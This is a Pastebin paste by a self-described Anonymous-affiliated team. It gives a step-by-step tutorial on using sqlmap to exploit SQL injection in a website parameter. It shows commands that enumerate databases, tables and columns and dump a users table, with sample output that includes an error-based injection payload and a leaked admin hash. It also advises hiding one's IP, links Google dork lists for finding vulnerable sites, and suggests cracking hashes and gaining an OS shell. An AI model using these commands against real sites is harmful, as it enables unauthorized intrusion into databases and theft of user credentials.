API tools faq
paste
Advertisement
CyberdarkKh

#Anonymous -SQLMap on Kali linux

CyberdarkKh
May 29th, 2015
1,275
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.11 KB | None | 0 0
raw download clone embed print report
  1. #############################################################
  2. ### #Team Cyberdark ( #Operation Freedom Tutorial ) ###
  3. #############################################################
  4.  
  5. +-------------------------------------------+
  6. Video [ Web Exploitation ] -> + SQL Injection + SQLMap on Kali Linux +
  7. +-------------------------------------------+
  8.  
  9.  
  10. All together don't forget Protect yourself it means hide your IP real local this link will show you How to hide your ip on Kali Linux :
  11. : https://youtu.be/Ttn1_WwdZzU
  12.  
  13.  
  14. What is Googledork lists ?
  15.  
  16. Googledorks lists to find bug Website vulnerability by SQL and you can tool to scanner website vulnerability by SQL i means it is a word for find bug website vulnerbility
  17. Download Googledork from this link : http://pastebin.com/Kxy8pdLL
  18. =============================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
  19. >>> SQLMAP on Kali Linux Tutorial <<< Step by step text tutorial
  20.  
  21.  
  22. Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions. Written in python it is one of the most powerful hacking tools out there. Sqlmap is the metasploit of sql injections.
  23.  
  24. Sqlmap is included in pen testing linux distros like kali linux, backtrack, backbox etc. On other distros it can be simply downloaded from the following url
  25.  
  26. http://sqlmap.org/.
  27.  
  28. Since its written in python, first you have to install python on your system. On ubuntu install python from synaptic. On windows install activestate python. Check out this post for details on how to install and run sqlmap on windows.
  29.  
  30. For the list of options and parameters that can be used with the sqlmap command, check the sqlmap documentation at
  31. https://github.com/sqlmapproject/sqlmap/wiki/Usage
  32.  
  33. In this tutorial we are going to learn how to use sqlmap to exploit a vulnerable web application and see what all can be done with such a tool.
  34.  
  35. To understand this tutorial you should have thorough knowledge of how database driven web applications work. For example those made with php+mysql.
  36. Vulnerable Urls
  37.  
  38. Lets say there is a web application or website that has a url in it like this
  39.  
  40. http://www.site.com/section.php?id=51
  41.  
  42. and it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url
  43.  
  44. http://www.site.com/section.php?id=51'
  45.  
  46. We just added a single quote in the parameter. If this url throws an error or reacts in an unexpected manner then it is clear that the database has got the unexpected single quote which the application did not escape properly. So in this case this input parameter "id" is vulnerable to sql injection.
  47. Hacking with sqlmap
  48.  
  49. Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter.
  50.  
  51. python sqlmap.py -u "http://www.site.com/section.php?id=51"
  52.  
  53. The above is the first and most simple command to run with the sqlmap tool. It checks the input parameters to find if they are vulnerable to sql injection or not. For this sqlmap sends different kinds of sql injection payloads to the input parameter and checks the output. In the process sqlmap is also able to identify the remote system os, database name and version. Here is how the output might look like
  54.  
  55. [*] starting at 12:10:33
  56.  
  57. [12:10:33] [INFO] resuming back-end DBMS 'mysql'
  58. [12:10:34] [INFO] testing connection to the target url
  59. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  60. ---
  61. Place: GET
  62. Parameter: id
  63. Type: error-based
  64. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  65. Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  66. ---
  67. [12:10:37] [INFO] the back-end DBMS is MySQL
  68. web server operating system: FreeBSD
  69. web application technology: Apache 2.2.22
  70. back-end DBMS: MySQL 5
  71.  
  72. So the sqlmap tool has discovered the operating system, web server and database along with version information. Even this much is pretty impressive. But its time to move on and see what more is this tool capable of.
  73. Discover Databases
  74.  
  75. Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.
  76.  
  77. $ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs
  78.  
  79. The output could be something like this
  80.  
  81. [*] starting at 12:12:56
  82.  
  83. [12:12:56] [INFO] resuming back-end DBMS 'mysql'
  84. [12:12:57] [INFO] testing connection to the target url
  85. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  86. ---
  87. Place: GET
  88. Parameter: id
  89. Type: error-based
  90. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  91. Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  92. ---
  93. [12:13:00] [INFO] the back-end DBMS is MySQL
  94. web server operating system: FreeBSD
  95. web application technology: Apache 2.2.22
  96. back-end DBMS: MySQL 5
  97. [12:13:00] [INFO] fetching database names
  98. [12:13:00] [INFO] the SQL query used returns 2 entries
  99. [12:13:00] [INFO] resumed: information_schema
  100. [12:13:00] [INFO] resumed: safecosmetics
  101. available databases [2]:
  102. [*] information_schema
  103. [*] safecosmetics
  104.  
  105. The output shows the existing databases on the remote system.
  106. Find tables in a particular database
  107.  
  108. Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is 'safecosmetics'
  109.  
  110. Command
  111.  
  112. $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics
  113.  
  114. and the output can be something similar to this
  115.  
  116. [11:55:18] [INFO] the back-end DBMS is MySQL
  117. web server operating system: FreeBSD
  118. web application technology: Apache 2.2.22
  119. back-end DBMS: MySQL 5
  120. [11:55:18] [INFO] fetching tables for database: 'safecosmetics'
  121. [11:55:19] [INFO] heuristics detected web page charset 'ascii'
  122. [11:55:19] [INFO] the SQL query used returns 216 entries
  123. [11:55:20] [INFO] retrieved: acl_acl
  124. [11:55:21] [INFO] retrieved: acl_acl_sections
  125. ........... more tables
  126.  
  127. isnt this amazing ? it if ofcourse. Lets get the columns of a particular table now.
  128. Get columns of a table
  129.  
  130. Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is 'users' and it contains the username and password.
  131.  
  132. $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users
  133.  
  134. The output can be something like this
  135.  
  136. [12:17:39] [INFO] the back-end DBMS is MySQL
  137. web server operating system: FreeBSD
  138. web application technology: Apache 2.2.22
  139. back-end DBMS: MySQL 5
  140. [12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
  141. [12:17:41] [INFO] heuristics detected web page charset 'ascii'
  142. [12:17:41] [INFO] the SQL query used returns 8 entries
  143. [12:17:42] [INFO] retrieved: id
  144. [12:17:43] [INFO] retrieved: int(11)
  145. [12:17:45] [INFO] retrieved: name
  146. [12:17:46] [INFO] retrieved: text
  147. [12:17:47] [INFO] retrieved: password
  148. [12:17:48] [INFO] retrieved: text
  149.  
  150. .......
  151.  
  152. [12:17:59] [INFO] retrieved: hash
  153. [12:18:01] [INFO] retrieved: varchar(128)
  154. Database: safecosmetics
  155. Table: users
  156. [8 columns]
  157. +-------------------+--------------+
  158. | Column | Type |
  159. +-------------------+--------------+
  160. | email | text |
  161. | hash | varchar(128) |
  162. | id | int(11) |
  163. | name | text |
  164. | password | text |
  165. | permission | tinyint(4) |
  166. | system_allow_only | text |
  167. | system_home | text |
  168. +-------------------+--------------+
  169.  
  170. So now the columns are clearly visible. Good job!
  171. Get data from a table
  172.  
  173. Now comes the most interesting part, of extracting the data from the table. The command would be
  174.  
  175. $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users
  176.  
  177. The above command will simply dump the data of the particular table, very much like the mysqldump command.
  178. The output might look similar to this
  179.  
  180. +----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
  181. | id | hash | name | email | password | permission | system_home | system_allow_only |
  182. +----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
  183. | 1 | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank> | 3 | <blank> | <blank> |
  184. +----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
  185.  
  186. The hash column seems to have the password hash. Try cracking the hash and then you would get the login details rightaway. sqlmap will create a csv file containing the dump data for easy analysis.
  187.  
  188. So far we have been able to collect a lot of information from the remote database using sqlmap. Its almost like having direct access to remote database through a client like phpmyadmin. In real scenarios hackers would try to gain a higher level to access to the system. For this, they would try to crack the password hashes and try to login through the admin panel. Or they would try to get an os shell using sqlmap.
  189.  
  190. I wrote another post on using sqlmap to get more details about remote databases. It explains the other options of sqlmap that are useful to find the out the database users, their privileges and their password hashes.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!